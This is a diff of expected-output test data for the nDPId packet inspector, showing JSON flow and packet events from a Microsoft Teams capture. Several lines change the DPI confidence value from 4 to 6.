+00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"thread_ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="} +00872{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041682698,"flow_last_seen":1587041682792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1587041682792,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"} -01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01032{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01086{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1587041683142,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1587041683142,"pkt":"EBMx8Tl2KDc3AG3ICABFAABOVgkAAP8R4j3AqAEGwKgBAeCgADUAOmwyTTEBAAABAAAAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1587041683184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1587041683184,"pkt":"KDc3AG3IEBMx8Tl2CABFAADQTcNAADkRcALAqAEBwKgBBgA14KAAvAAATTGBgAABAAMAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAHADAAFAAEAAAAMACoVdGVhbXMtY2hhdHN2Y2FnZy1wcm9kDnRyYWZmaWNtYW5hZ2VyA25ldADAPgAFAAEAAAEsADAWbXNnLXVrc28tMDEtY2hhdHN2Y2FnZwd1a3NvdXRoCGNsb3VkYXBwBWF6dXJlwCnAdAABAAEAAAAFAAQ0clg7"} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041683406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683396,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 